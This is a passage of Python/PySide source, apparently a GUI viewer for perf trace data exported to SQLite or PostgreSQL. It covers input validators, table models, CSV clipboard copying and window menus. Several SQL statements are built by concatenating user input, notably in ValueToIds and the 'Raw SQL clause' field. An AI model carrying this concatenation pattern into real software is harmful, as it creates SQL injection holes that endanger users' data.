self.widget.setPalette(palette)
self.red = True
def TurnTextNormal(self):
if self.red:
palette = QPalette()
self.widget.setPalette(palette)
self.red = False
def InvalidValue(self, value):
self.value = ""
self.TurnTextRed()
self.error = self.label + " invalid value '" + value + "'"
self.parent.ShowMessage(self.error)
def Invalidate(self):
self.validated = False
def DoValidate(self, input_string):
self.value = input_string.strip()
def Validate(self):
self.validated = True
self.error = ""
self.TurnTextNormal()
self.parent.ClearMessage()
input_string = self.widget.text()
if not len(input_string.strip()):
self.value = ""
return
self.DoValidate(input_string)
def IsValid(self):
if not self.validated:
self.Validate()
if len(self.error):
self.parent.ShowMessage(self.error)
return False
return True
def IsNumber(self, value):
try:
x = int(value)
except:
x = 0
return str(x) == value
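# Illustrative note (not original text): IsNumber() accepts only canonical decimal
# strings, because str(int(value)) must reproduce the input exactly - IsNumber("42")
# is True, while IsNumber("042"), IsNumber("1.5") and IsNumber("") are all False.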
# Non-negative integer ranges dialog data item
class NonNegativeIntegerRangesDataItem(LineEditDataItem):
def __init__(self, glb, label, placeholder_text, column_name, parent):
super(NonNegativeIntegerRangesDataItem, self).__init__(glb, label, placeholder_text, parent)
self.column_name = column_name
def DoValidate(self, input_string):
singles = []
ranges = []
for value in [x.strip() for x in input_string.split(",")]:
if "-" in value:
vrange = value.split("-")
if len(vrange) != 2 or not self.IsNumber(vrange[0]) or not self.IsNumber(vrange[1]):
return self.InvalidValue(value)
ranges.append(vrange)
else:
if not self.IsNumber(value):
return self.InvalidValue(value)
singles.append(value)
ranges = [("(" + self.column_name + " >= " + r[0] + " AND " + self.column_name + " <= " + r[1] + ")") for r in ranges]
if len(singles):
ranges.append(self.column_name + " IN (" + ",".join(singles) + ")")
self.value = " OR ".join(ranges)
# Positive integer dialog data item
class PositiveIntegerDataItem(LineEditDataItem):
def __init__(self, glb, label, placeholder_text, parent, id = "", default = ""):
super(PositiveIntegerDataItem, self).__init__(glb, label, placeholder_text, parent, id, default)
def DoValidate(self, input_string):
if not self.IsNumber(input_string.strip()):
return self.InvalidValue(input_string)
value = int(input_string.strip())
if value <= 0:
return self.InvalidValue(input_string)
self.value = str(value)
# Dialog data item converted and validated using a SQL table
class SQLTableDataItem(LineEditDataItem):
def __init__(self, glb, label, placeholder_text, table_name, match_column, column_name1, column_name2, parent):
super(SQLTableDataItem, self).__init__(glb, label, placeholder_text, parent)
self.table_name = table_name
self.match_column = match_column
self.column_name1 = column_name1
self.column_name2 = column_name2
def ValueToIds(self, value):
ids = []
query = QSqlQuery(self.glb.db)
stmt = "SELECT id FROM " + self.table_name + " WHERE " + self.match_column + " = '" + value + "'"
ret = query.exec_(stmt)
if ret:
while query.next():
ids.append(str(query.value(0)))
return ids
def DoValidate(self, input_string):
all_ids = []
for value in [x.strip() for x in input_string.split(",")]:
ids = self.ValueToIds(value)
if len(ids):
all_ids.extend(ids)
else:
return self.InvalidValue(value)
self.value = self.column_name1 + " IN (" + ",".join(all_ids) + ")"
if self.column_name2:
self.value = "( " + self.value + " OR " + self.column_name2 + " IN (" + ",".join(all_ids) + ") )"
# Sample time ranges dialog data item converted and validated using 'samples' SQL table
class SampleTimeRangesDataItem(LineEditDataItem):
def __init__(self, glb, label, placeholder_text, column_name, parent):
self.column_name = column_name
self.last_id = 0
self.first_time = 0
self.last_time = 2 ** 64
query = QSqlQuery(glb.db)
QueryExec(query, "SELECT id, time FROM samples ORDER BY id DESC LIMIT 1")
if query.next():
self.last_id = int(query.value(0))
self.first_time = int(glb.HostStartTime())
self.last_time = int(glb.HostFinishTime())
if placeholder_text:
placeholder_text += ", between " + str(self.first_time) + " and " + str(self.last_time)
super(SampleTimeRangesDataItem, self).__init__(glb, label, placeholder_text, parent)
def IdBetween(self, query, lower_id, higher_id, order):
QueryExec(query, "SELECT id FROM samples WHERE id > " + str(lower_id) + " AND id < " + str(higher_id) + " ORDER BY id " + order + " LIMIT 1")
if query.next():
return True, int(query.value(0))
else:
return False, 0
def BinarySearchTime(self, lower_id, higher_id, target_time, get_floor):
query = QSqlQuery(self.glb.db)
while True:
next_id = int((lower_id + higher_id) / 2)
QueryExec(query, "SELECT time FROM samples WHERE id = " + str(next_id))
if not query.next():
ok, dbid = self.IdBetween(query, lower_id, next_id, "DESC")
if not ok:
ok, dbid = self.IdBetween(query, next_id, higher_id, "")
if not ok:
return str(higher_id)
next_id = dbid
QueryExec(query, "SELECT time FROM samples WHERE id = " + str(next_id))
next_time = int(query.value(0))
if get_floor:
if target_time > next_time:
lower_id = next_id
else:
higher_id = next_id
if higher_id <= lower_id + 1:
return str(higher_id)
else:
if target_time >= next_time:
lower_id = next_id
else:
higher_id = next_id
if higher_id <= lower_id + 1:
return str(lower_id)
def ConvertRelativeTime(self, val):
mult = 1
suffix = val[-2:]
if suffix == "ms":
mult = 1000000
elif suffix == "us":
mult = 1000
elif suffix == "ns":
mult = 1
else:
return val
val = val[:-2].strip()
if not self.IsNumber(val):
return val
val = int(val) * mult
if val >= 0:
val += self.first_time
else:
val += self.last_time
return str(val)
def ConvertTimeRange(self, vrange):
if vrange[0] == "":
vrange[0] = str(self.first_time)
if vrange[1] == "":
vrange[1] = str(self.last_time)
vrange[0] = self.ConvertRelativeTime(vrange[0])
vrange[1] = self.ConvertRelativeTime(vrange[1])
if not self.IsNumber(vrange[0]) or not self.IsNumber(vrange[1]):
return False
beg_range = max(int(vrange[0]), self.first_time)
end_range = min(int(vrange[1]), self.last_time)
if beg_range > self.last_time or end_range < self.first_time:
return False
vrange[0] = self.BinarySearchTime(0, self.last_id, beg_range, True)
vrange[1] = self.BinarySearchTime(1, self.last_id + 1, end_range, False)
return True
def AddTimeRange(self, value, ranges):
n = value.count("-")
if n == 1:
pass
elif n == 2:
if value.split("-")[1].strip() == "":
n = 1
elif n == 3:
n = 2
else:
return False
pos = findnth(value, "-", n)
vrange = [value[:pos].strip(), value[pos+1:].strip()]
if self.ConvertTimeRange(vrange):
ranges.append(vrange)
return True
return False
def DoValidate(self, input_string):
ranges = []
for value in [x.strip() for x in input_string.split(",")]:
if not self.AddTimeRange(value, ranges):
return self.InvalidValue(value)
ranges = [("(" + self.column_name + " >= " + r[0] + " AND " + self.column_name + " <= " + r[1] + ")") for r in ranges]
self.value = " OR ".join(ranges)
# Report Dialog Base
class ReportDialogBase(QDialog):
def __init__(self, glb, title, items, partial, parent=None):
super(ReportDialogBase, self).__init__(parent)
self.glb = glb
self.report_vars = ReportVars()
self.setWindowTitle(title)
self.setMinimumWidth(600)
self.data_items = [x(glb, self) for x in items]
self.partial = partial
self.grid = QGridLayout()
for row in xrange(len(self.data_items)):
self.grid.addWidget(QLabel(self.data_items[row].label), row, 0)
self.grid.addWidget(self.data_items[row].widget, row, 1)
self.status = QLabel()
self.ok_button = QPushButton("Ok", self)
self.ok_button.setDefault(True)
self.ok_button.released.connect(self.Ok)
self.ok_button.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.cancel_button = QPushButton("Cancel", self)
self.cancel_button.released.connect(self.reject)
self.cancel_button.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.hbox = QHBoxLayout()
#self.hbox.addStretch()
self.hbox.addWidget(self.status)
self.hbox.addWidget(self.ok_button)
self.hbox.addWidget(self.cancel_button)
self.vbox = QVBoxLayout()
self.vbox.addLayout(self.grid)
self.vbox.addLayout(self.hbox)
self.setLayout(self.vbox)
def Ok(self):
vars = self.report_vars
for d in self.data_items:
if d.id == "REPORTNAME":
vars.name = d.value
if not vars.name:
self.ShowMessage("Report name is required")
return
for d in self.data_items:
if not d.IsValid():
return
for d in self.data_items[1:]:
if d.id == "LIMIT":
vars.limit = d.value
elif len(d.value):
if len(vars.where_clause):
vars.where_clause += " AND "
vars.where_clause += d.value
if len(vars.where_clause):
if self.partial:
vars.where_clause = " AND ( " + vars.where_clause + " ) "
else:
vars.where_clause = " WHERE " + vars.where_clause + " "
self.accept()
def ShowMessage(self, msg):
self.status.setText("<font color=#FF0000>" + msg)
def ClearMessage(self):
self.status.setText("")
# Selected branch report creation dialog
class SelectedBranchDialog(ReportDialogBase):
def __init__(self, glb, parent=None):
title = "Selected Branches"
items = (lambda g, p: LineEditDataItem(g, "Report name:", "Enter a name to appear in the window title bar", p, "REPORTNAME"),
lambda g, p: SampleTimeRangesDataItem(g, "Time ranges:", "Enter time ranges", "samples.id", p),
lambda g, p: NonNegativeIntegerRangesDataItem(g, "CPUs:", "Enter CPUs or ranges e.g. 0,5-6", "cpu", p),
lambda g, p: SQLTableDataItem(g, "Commands:", "Only branches with these commands will be included", "comms", "comm", "comm_id", "", p),
lambda g, p: SQLTableDataItem(g, "PIDs:", "Only branches with these process IDs will be included", "threads", "pid", "thread_id", "", p),
lambda g, p: SQLTableDataItem(g, "TIDs:", "Only branches with these thread IDs will be included", "threads", "tid", "thread_id", "", p),
lambda g, p: SQLTableDataItem(g, "DSOs:", "Only branches with these DSOs will be included", "dsos", "short_name", "samples.dso_id", "to_dso_id", p),
lambda g, p: SQLTableDataItem(g, "Symbols:", "Only branches with these symbols will be included", "symbols", "name", "symbol_id", "to_symbol_id", p),
lambda g, p: LineEditDataItem(g, "Raw SQL clause: ", "Enter a raw SQL WHERE clause", p))
super(SelectedBranchDialog, self).__init__(glb, title, items, True, parent)
# Event list
def GetEventList(db):
events = []
query = QSqlQuery(db)
QueryExec(query, "SELECT name FROM selected_events WHERE id > 0 ORDER BY id")
while query.next():
events.append(query.value(0))
return events
# Is a table selectable
def IsSelectable(db, table, sql = "", columns = "*"):
query = QSqlQuery(db)
try:
QueryExec(query, "SELECT " + columns + " FROM " + table + " " + sql + " LIMIT 1")
except:
return False
return True
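# Illustrative note (not original text): IsSelectable() is a cheap capability probe,
# e.g. IsSelectable(glb.db, "samples", columns = "insn_count, cyc_count") is used above
# to detect the optional IPC columns, and IsSelectable(glb.db, "calls", "WHERE parent_id >= 0")
# to detect call/return data.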
# SQL table data model item
class SQLTableItem():
def __init__(self, row, data):
self.row = row
self.data = data
def getData(self, column):
return self.data[column]
# SQL table data model
class SQLTableModel(TableModel):
progress = Signal(object)
def __init__(self, glb, sql, column_headers, parent=None):
super(SQLTableModel, self).__init__(parent)
self.glb = glb
self.more = True
self.populated = 0
self.column_headers = column_headers
self.fetcher = SQLFetcher(glb, sql, lambda x, y=len(column_headers): self.SQLTableDataPrep(x, y), self.AddSample)
self.fetcher.done.connect(self.Update)
self.fetcher.Fetch(glb_chunk_sz)
def DisplayData(self, item, index):
self.FetchIfNeeded(item.row)
return item.getData(index.column())
def AddSample(self, data):
child = SQLTableItem(self.populated, data)
self.child_items.append(child)
self.populated += 1
def Update(self, fetched):
if not fetched:
self.more = False
self.progress.emit(0)
child_count = self.child_count
count = self.populated - child_count
if count > 0:
parent = QModelIndex()
self.beginInsertRows(parent, child_count, child_count + count - 1)
self.insertRows(child_count, count, parent)
self.child_count += count
self.endInsertRows()
self.progress.emit(self.child_count)
def FetchMoreRecords(self, count):
current = self.child_count
if self.more:
self.fetcher.Fetch(count)
else:
self.progress.emit(0)
return current
def HasMoreRecords(self):
return self.more
def columnCount(self, parent=None):
return len(self.column_headers)
def columnHeader(self, column):
return self.column_headers[column]
def SQLTableDataPrep(self, query, count):
data = []
for i in xrange(count):
data.append(query.value(i))
return data
# SQL automatic table data model
class SQLAutoTableModel(SQLTableModel):
def __init__(self, glb, table_name, parent=None):
sql = "SELECT * FROM " + table_name + " WHERE id > $$last_id$$ ORDER BY id LIMIT " + str(glb_chunk_sz)
if table_name == "comm_threads_view":
# For now, comm_threads_view has no id column
sql = "SELECT * FROM " + table_name + " WHERE comm_id > $$last_id$$ ORDER BY comm_id LIMIT " + str(glb_chunk_sz)
column_headers = []
query = QSqlQuery(glb.db)
if glb.dbref.is_sqlite3:
QueryExec(query, "PRAGMA table_info(" + table_name + ")")
while query.next():
column_headers.append(query.value(1))
if table_name == "sqlite_master":
sql = "SELECT * FROM " + table_name
else:
if table_name[:19] == "information_schema.":
sql = "SELECT * FROM " + table_name
select_table_name = table_name[19:]
schema = "information_schema"
else:
select_table_name = table_name
schema = "public"
QueryExec(query, "SELECT column_name FROM information_schema.columns WHERE table_schema = '" + schema + "' and table_name = '" + select_table_name + "'")
while query.next():
column_headers.append(query.value(0))
if pyside_version_1 and sys.version_info[0] == 3:
if table_name == "samples_view":
self.SQLTableDataPrep = self.samples_view_DataPrep
if table_name == "samples":
self.SQLTableDataPrep = self.samples_DataPrep
super(SQLAutoTableModel, self).__init__(glb, sql, column_headers, parent)
def samples_view_DataPrep(self, query, count):
data = []
data.append(query.value(0))
# Workaround pyside failing to handle large integers (i.e. time) in python3 by converting to a string
data.append("{:>19}".format(query.value(1)))
for i in xrange(2, count):
data.append(query.value(i))
return data
def samples_DataPrep(self, query, count):
data = []
for i in xrange(9):
data.append(query.value(i))
# Workaround pyside failing to handle large integers (i.e. time) in python3 by converting to a string
data.append("{:>19}".format(query.value(9)))
for i in xrange(10, count):
data.append(query.value(i))
return data
# Base class for custom ResizeColumnsToContents
class ResizeColumnsToContentsBase(QObject):
def __init__(self, parent=None):
super(ResizeColumnsToContentsBase, self).__init__(parent)
def ResizeColumnToContents(self, column, n):
# Using the view's resizeColumnToContents() here is extremely slow
# so implement a crude alternative
font = self.view.font()
metrics = QFontMetrics(font)
max = 0
for row in xrange(n):
val = self.data_model.child_items[row].data[column]
len = metrics.width(str(val) + "MM")
max = len if len > max else max
val = self.data_model.columnHeader(column)
len = metrics.width(str(val) + "MM")
max = len if len > max else max
self.view.setColumnWidth(column, max)
def ResizeColumnsToContents(self):
n = min(self.data_model.child_count, 100)
if n < 1:
# No data yet, so connect a signal to notify when there is
self.data_model.rowsInserted.connect(self.UpdateColumnWidths)
return
columns = self.data_model.columnCount()
for i in xrange(columns):
self.ResizeColumnToContents(i, n)
def UpdateColumnWidths(self, *x):
# This only needs to be done once, so disconnect the signal now
self.data_model.rowsInserted.disconnect(self.UpdateColumnWidths)
self.ResizeColumnsToContents()
# Convert value to CSV
def ToCSValue(val):
if '"' in val:
val = val.replace('"', '""')
if "," in val or '"' in val:
val = '"' + val + '"'
return val
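# Illustrative example (not part of the original code):
#   ToCSValue('say "hi", ok')  ->  '"say ""hi"", ok"'
# i.e. embedded quotes are doubled and the value is quoted when it contains a comma or a quote.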
# Key to sort table model indexes by row / column, assuming fewer than 1000 columns
glb_max_cols = 1000
def RowColumnKey(a):
return a.row() * glb_max_cols + a.column()
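# Illustrative example (not original text): an index at row 2, column 5 gets the key
# 2 * 1000 + 5 = 2005, so sorting by RowColumnKey orders selected cells row-major.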
# Copy selected table cells to clipboard
def CopyTableCellsToClipboard(view, as_csv=False, with_hdr=False):
indexes = sorted(view.selectedIndexes(), key=RowColumnKey)
idx_cnt = len(indexes)
if not idx_cnt:
return
if idx_cnt == 1:
with_hdr=False
min_row = indexes[0].row()
max_row = indexes[0].row()
min_col = indexes[0].column()
max_col = indexes[0].column()
for i in indexes:
min_row = min(min_row, i.row())
max_row = max(max_row, i.row())
min_col = min(min_col, i.column())
max_col = max(max_col, i.column())
if max_col > glb_max_cols:
raise RuntimeError("glb_max_cols is too low")
max_width = [0] * (1 + max_col - min_col)
for i in indexes:
c = i.column() - min_col
max_width[c] = max(max_width[c], len(str(i.data())))
text = ""
pad = ""
sep = ""
if with_hdr:
model = indexes[0].model()
for col in range(min_col, max_col + 1):
val = model.headerData(col, Qt.Horizontal, Qt.DisplayRole)
if as_csv:
text += sep + ToCSValue(val)
sep = ","
else:
c = col - min_col
max_width[c] = max(max_width[c], len(val))
width = max_width[c]
align = model.headerData(col, Qt.Horizontal, Qt.TextAlignmentRole)
if align & Qt.AlignRight:
val = val.rjust(width)
text += pad + sep + val
pad = " " * (width - len(val))
sep = " "
text += "\n"
pad = ""
sep = ""
last_row = min_row
for i in indexes:
if i.row() > last_row:
last_row = i.row()
text += "\n"
pad = ""
sep = ""
if as_csv:
text += sep + ToCSValue(str(i.data()))
sep = ","
else:
width = max_width[i.column() - min_col]
if i.data(Qt.TextAlignmentRole) & Qt.AlignRight:
val = str(i.data()).rjust(width)
else:
val = str(i.data())
text += pad + sep + val
pad = " " * (width - len(val))
sep = " "
QApplication.clipboard().setText(text)
def CopyTreeCellsToClipboard(view, as_csv=False, with_hdr=False):
indexes = view.selectedIndexes()
if not len(indexes):
return
selection = view.selectionModel()
first = None
for i in indexes:
above = view.indexAbove(i)
if not selection.isSelected(above):
first = i
break
if first is None:
raise RuntimeError("CopyTreeCellsToClipboard internal error")
model = first.model()
row_cnt = 0
col_cnt = model.columnCount(first)
max_width = [0] * col_cnt
indent_sz = 2
indent_str = " " * indent_sz
expanded_mark_sz = 2
if sys.version_info[0] == 3:
expanded_mark = "\u25BC "
not_expanded_mark = "\u25B6 "
else:
expanded_mark = unicode(chr(0xE2) + chr(0x96) + chr(0xBC) + " ", "utf-8")
not_expanded_mark = unicode(chr(0xE2) + chr(0x96) + chr(0xB6) + " ", "utf-8")
leaf_mark = " "
if not as_csv:
pos = first
while True:
row_cnt += 1
row = pos.row()
for c in range(col_cnt):
i = pos.sibling(row, c)
if c:
n = len(str(i.data()))
else:
n = len(str(i.data()).strip())
n += (i.internalPointer().level - 1) * indent_sz
n += expanded_mark_sz
max_width[c] = max(max_width[c], n)
pos = view.indexBelow(pos)
if not selection.isSelected(pos):
break
text = ""
pad = ""
sep = ""
if with_hdr:
for c in range(col_cnt):
val = model.headerData(c, Qt.Horizontal, Qt.DisplayRole).strip()
if as_csv:
text += sep + ToCSValue(val)
sep = ","
else:
max_width[c] = max(max_width[c], len(val))
width = max_width[c]
align = model.headerData(c, Qt.Horizontal, Qt.TextAlignmentRole)
if align & Qt.AlignRight:
val = val.rjust(width)
text += pad + sep + val
pad = " " * (width - len(val))
sep = " "
text += "\n"
pad = ""
sep = ""
pos = first
while True:
row = pos.row()
for c in range(col_cnt):
i = pos.sibling(row, c)
val = str(i.data())
if not c:
if model.hasChildren(i):
if view.isExpanded(i):
mark = expanded_mark
else:
mark = not_expanded_mark
else:
mark = leaf_mark
val = indent_str * (i.internalPointer().level - 1) + mark + val.strip()
if as_csv:
text += sep + ToCSValue(val)
sep = ","
else:
width = max_width[c]
if c and i.data(Qt.TextAlignmentRole) & Qt.AlignRight:
val = val.rjust(width)
text += pad + sep + val
pad = " " * (width - len(val))
sep = " "
pos = view.indexBelow(pos)
if not selection.isSelected(pos):
break
text = text.rstrip() + "\n"
pad = ""
sep = ""
QApplication.clipboard().setText(text)
def CopyCellsToClipboard(view, as_csv=False, with_hdr=False):
view.CopyCellsToClipboard(view, as_csv, with_hdr)
def CopyCellsToClipboardHdr(view):
CopyCellsToClipboard(view, False, True)
def CopyCellsToClipboardCSV(view):
CopyCellsToClipboard(view, True, True)
# Context menu
class ContextMenu(object):
def __init__(self, view):
self.view = view
self.view.setContextMenuPolicy(Qt.CustomContextMenu)
self.view.customContextMenuRequested.connect(self.ShowContextMenu)
def ShowContextMenu(self, pos):
menu = QMenu(self.view)
self.AddActions(menu)
menu.exec_(self.view.mapToGlobal(pos))
def AddCopy(self, menu):
menu.addAction(CreateAction("&Copy selection", "Copy to clipboard", lambda: CopyCellsToClipboardHdr(self.view), self.view))
menu.addAction(CreateAction("Copy selection as CS&V", "Copy to clipboard as CSV", lambda: CopyCellsToClipboardCSV(self.view), self.view))
def AddActions(self, menu):
self.AddCopy(menu)
class TreeContextMenu(ContextMenu):
def __init__(self, view):
super(TreeContextMenu, self).__init__(view)
def AddActions(self, menu):
i = self.view.currentIndex()
text = str(i.data()).strip()
if len(text):
menu.addAction(CreateAction('Copy "' + text + '"', "Copy to clipboard", lambda: QApplication.clipboard().setText(text), self.view))
self.AddCopy(menu)
# Table window
class TableWindow(QMdiSubWindow, ResizeColumnsToContentsBase):
def __init__(self, glb, table_name, parent=None):
super(TableWindow, self).__init__(parent)
self.data_model = LookupCreateModel(table_name + " Table", lambda: SQLAutoTableModel(glb, table_name))
self.model = QSortFilterProxyModel()
self.model.setSourceModel(self.data_model)
self.view = QTableView()
self.view.setModel(self.model)
self.view.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.view.verticalHeader().setVisible(False)
self.view.sortByColumn(-1, Qt.AscendingOrder)
self.view.setSortingEnabled(True)
self.view.setSelectionMode(QAbstractItemView.ContiguousSelection)
self.view.CopyCellsToClipboard = CopyTableCellsToClipboard
self.ResizeColumnsToContents()
self.context_menu = ContextMenu(self.view)
self.find_bar = FindBar(self, self, True)
self.finder = ChildDataItemFinder(self.data_model)
self.fetch_bar = FetchMoreRecordsBar(self.data_model, self)
self.vbox = VBox(self.view, self.find_bar.Widget(), self.fetch_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, table_name + " Table")
def Find(self, value, direction, pattern, context):
self.view.setFocus()
self.find_bar.Busy()
self.finder.Find(value, direction, pattern, context, self.FindDone)
def FindDone(self, row):
self.find_bar.Idle()
if row >= 0:
self.view.setCurrentIndex(self.model.mapFromSource(self.data_model.index(row, 0, QModelIndex())))
else:
self.find_bar.NotFound()
# Table list
def GetTableList(glb):
tables = []
query = QSqlQuery(glb.db)
if glb.dbref.is_sqlite3:
QueryExec(query, "SELECT name FROM sqlite_master WHERE type IN ( 'table' , 'view' ) ORDER BY name")
else:
QueryExec(query, "SELECT table_name FROM information_schema.tables WHERE table_schema = 'public' AND table_type IN ( 'BASE TABLE' , 'VIEW' ) ORDER BY table_name")
while query.next():
tables.append(query.value(0))
if glb.dbref.is_sqlite3:
tables.append("sqlite_master")
else:
tables.append("information_schema.tables")
tables.append("information_schema.views")
tables.append("information_schema.columns")
return tables
# Top Calls data model
class TopCallsModel(SQLTableModel):
def __init__(self, glb, report_vars, parent=None):
text = ""
if not glb.dbref.is_sqlite3:
text = "::text"
limit = ""
if len(report_vars.limit):
limit = " LIMIT " + report_vars.limit
sql = ("SELECT comm, pid, tid, name,"
" CASE"
" WHEN (short_name = '[kernel.kallsyms]') THEN '[kernel]'" + text +
" ELSE short_name"
" END AS dso,"
" call_time, return_time, (return_time - call_time) AS elapsed_time, branch_count, "
" CASE"
" WHEN (calls.flags = 1) THEN 'no call'" + text +
" WHEN (calls.flags = 2) THEN 'no return'" + text +
" WHEN (calls.flags = 3) THEN 'no call/return'" + text +
" ELSE ''" + text +
" END AS flags"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" INNER JOIN dsos ON symbols.dso_id = dsos.id"
" INNER JOIN comms ON calls.comm_id = comms.id"
" INNER JOIN threads ON calls.thread_id = threads.id" +
report_vars.where_clause +
" ORDER BY elapsed_time DESC" +
limit
)
column_headers = ("Command", "PID", "TID", "Symbol", "Object", "Call Time", "Return Time", "Elapsed Time (ns)", "Branch Count", "Flags")
self.alignment = (Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignRight, Qt.AlignRight, Qt.AlignLeft)
super(TopCallsModel, self).__init__(glb, sql, column_headers, parent)
def columnAlignment(self, column):
return self.alignment[column]
# Top Calls report creation dialog
class TopCallsDialog(ReportDialogBase):
def __init__(self, glb, parent=None):
title = "Top Calls by Elapsed Time"
items = (lambda g, p: LineEditDataItem(g, "Report name:", "Enter a name to appear in the window title bar", p, "REPORTNAME"),
lambda g, p: SQLTableDataItem(g, "Commands:", "Only calls with these commands will be included", "comms", "comm", "comm_id", "", p),
lambda g, p: SQLTableDataItem(g, "PIDs:", "Only calls with these process IDs will be included", "threads", "pid", "thread_id", "", p),
lambda g, p: SQLTableDataItem(g, "TIDs:", "Only calls with these thread IDs will be included", "threads", "tid", "thread_id", "", p),
lambda g, p: SQLTableDataItem(g, "DSOs:", "Only calls with these DSOs will be included", "dsos", "short_name", "dso_id", "", p),
lambda g, p: SQLTableDataItem(g, "Symbols:", "Only calls with these symbols will be included", "symbols", "name", "symbol_id", "", p),
lambda g, p: LineEditDataItem(g, "Raw SQL clause: ", "Enter a raw SQL WHERE clause", p),
lambda g, p: PositiveIntegerDataItem(g, "Record limit:", "Limit selection to this number of records", p, "LIMIT", "100"))
super(TopCallsDialog, self).__init__(glb, title, items, False, parent)
# Top Calls window
class TopCallsWindow(QMdiSubWindow, ResizeColumnsToContentsBase):
def __init__(self, glb, report_vars, parent=None):
super(TopCallsWindow, self).__init__(parent)
self.data_model = LookupCreateModel("Top Calls " + report_vars.UniqueId(), lambda: TopCallsModel(glb, report_vars))
self.model = self.data_model
self.view = QTableView()
self.view.setModel(self.model)
self.view.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.view.verticalHeader().setVisible(False)
self.view.setSelectionMode(QAbstractItemView.ContiguousSelection)
self.view.CopyCellsToClipboard = CopyTableCellsToClipboard
self.context_menu = ContextMenu(self.view)
self.ResizeColumnsToContents()
self.find_bar = FindBar(self, self, True)
self.finder = ChildDataItemFinder(self.model)
self.fetch_bar = FetchMoreRecordsBar(self.data_model, self)
self.vbox = VBox(self.view, self.find_bar.Widget(), self.fetch_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, report_vars.name)
def Find(self, value, direction, pattern, context):
self.view.setFocus()
self.find_bar.Busy()
self.finder.Find(value, direction, pattern, context, self.FindDone)
def FindDone(self, row):
self.find_bar.Idle()
if row >= 0:
self.view.setCurrentIndex(self.model.index(row, 0, QModelIndex()))
else:
self.find_bar.NotFound()
# Action Definition
def CreateAction(label, tip, callback, parent=None, shortcut=None):
action = QAction(label, parent)
if shortcut != None:
action.setShortcuts(shortcut)
action.setStatusTip(tip)
action.triggered.connect(callback)
return action
# Typical application actions
def CreateExitAction(app, parent=None):
return CreateAction("&Quit", "Exit the application", app.closeAllWindows, parent, QKeySequence.Quit)
# Typical MDI actions
def CreateCloseActiveWindowAction(mdi_area):
return CreateAction("Cl&ose", "Close the active window", mdi_area.closeActiveSubWindow, mdi_area)
def CreateCloseAllWindowsAction(mdi_area):
return CreateAction("Close &All", "Close all the windows", mdi_area.closeAllSubWindows, mdi_area)
def CreateTileWindowsAction(mdi_area):
return CreateAction("&Tile", "Tile the windows", mdi_area.tileSubWindows, mdi_area)
def CreateCascadeWindowsAction(mdi_area):
return CreateAction("&Cascade", "Cascade the windows", mdi_area.cascadeSubWindows, mdi_area)
def CreateNextWindowAction(mdi_area):
return CreateAction("Ne&xt", "Move the focus to the next window", mdi_area.activateNextSubWindow, mdi_area, QKeySequence.NextChild)
def CreatePreviousWindowAction(mdi_area):
return CreateAction("Pre&vious", "Move the focus to the previous window", mdi_area.activatePreviousSubWindow, mdi_area, QKeySequence.PreviousChild)
# Typical MDI window menu
class WindowMenu():
def __init__(self, mdi_area, menu):
self.mdi_area = mdi_area
self.window_menu = menu.addMenu("&Windows")
self.close_active_window = CreateCloseActiveWindowAction(mdi_area)
self.close_all_windows = CreateCloseAllWindowsAction(mdi_area)
self.tile_windows = CreateTileWindowsAction(mdi_area)
self.cascade_windows = CreateCascadeWindowsAction(mdi_area)
self.next_window = CreateNextWindowAction(mdi_area)
self.previous_window = CreatePreviousWindowAction(mdi_area)
self.window_menu.aboutToShow.connect(self.Update)
def Update(self):
self.window_menu.clear()
sub_window_count = len(self.mdi_area.subWindowList())
have_sub_windows = sub_window_count != 0
self.close_active_window.setEnabled(have_sub_windows)
self.close_all_windows.setEnabled(have_sub_windows)
self.tile_windows.setEnabled(have_sub_windows)
self.cascade_windows.setEnabled(have_sub_windows)
self.next_window.setEnabled(have_sub_windows)
self.previous_window.setEnabled(have_sub_windows)
self.window_menu.addAction(self.close_active_window)
self.window_menu.addAction(self.close_all_windows)
self.window_menu.addSeparator()
self.window_menu.addAction(self.tile_windows)
self.window_menu.addAction(self.cascade_windows)
self.window_menu.addSeparator()
self.window_menu.addAction(self.next_window)
self.window_menu.addAction(self.previous_window)
if sub_window_count == 0:
return
self.window_menu.addSeparator()
nr = 1
for sub_window in self.mdi_area.subWindowList():
label = str(nr) + " " + sub_window.name
if nr < 10:
label = "&" + label
action = self.window_menu.addAction(label)
action.setCheckable(True)
action.setChecked(sub_window == self.mdi_area.activeSubWindow())
action.triggered.connect(lambda a=None,x=nr: self.setActiveSubWindow(x))
self.window_menu.addAction(action)
nr += 1
def setActiveSubWindow(self, nr):
self.mdi_area.setActiveSubWindow(self.mdi_area.subWindowList()[nr - 1])
# Help text
glb_help_text = """
<h1>Contents</h1>
<style>
p.c1 {
text-indent: 40px;
}
p.c2 {
text-indent: 80px;
}
</style>
<p class=c1><a href=#reports>1. Reports</a></p>
<p class=c2><a href=#callgraph>1.1 Context-Sensitive Call Graph</a></p>
<p class=c2><a href=#calltree>1.2 Call Tree</a></p>
<p class=c2><a href=#allbranches>1.3 All branches</a></p>
<p class=c2><a href=#selectedbranches>1.4 Selected branches</a></p>
<p class=c2><a href=#topcallsbyelapsedtime>1.5 Top calls by elapsed time</a></p>
<p class=c1><a href=#charts>2. Charts</a></p>
<p class=c2><a href=#timechartbycpu>2.1 Time chart by CPU</a></p>
<p class=c1><a href=#tables>3. Tables</a></p>
<h1 id=reports>1. Reports</h1>
<h2 id=callgraph>1.1 Context-Sensitive Call Graph</h2>
The result is a GUI window with a tree representing a context-sensitive
call-graph. Expanding a couple of levels of the tree and adjusting column
widths to suit will display something like:
<pre>
Call Graph: pt_example
Call Path Object Count Time(ns) Time(%) Branch Count Branch Count(%)
v- ls
v- 2638:2638
v- _start ld-2.19.so 1 10074071 100.0 211135 100.0
|- unknown unknown 1 13198 0.1 1 0.0
>- _dl_start ld-2.19.so 1 1400980 13.9 19637 9.3
>- _d_linit_internal ld-2.19.so 1 448152 4.4 11094 5.3
